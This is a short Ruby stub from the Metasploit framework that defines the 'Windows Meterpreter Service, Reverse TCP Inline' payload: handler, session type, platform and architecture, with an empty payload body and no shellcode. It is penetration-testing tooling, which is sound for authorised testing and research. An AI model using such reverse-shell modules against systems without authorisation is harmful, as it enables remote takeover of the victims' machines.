##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 0

  include Msf::Payload::Windows
  include Msf::Payload::Single
  include Msf::Sessions::MeterpreterOptions::Windows

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows Meterpreter Service, Reverse TCP Inline',
        'Description' => 'Stub payload for interacting with a Meterpreter Service',
        'Author' => 'hdm',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::Meterpreter_x86_Win,
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end
end
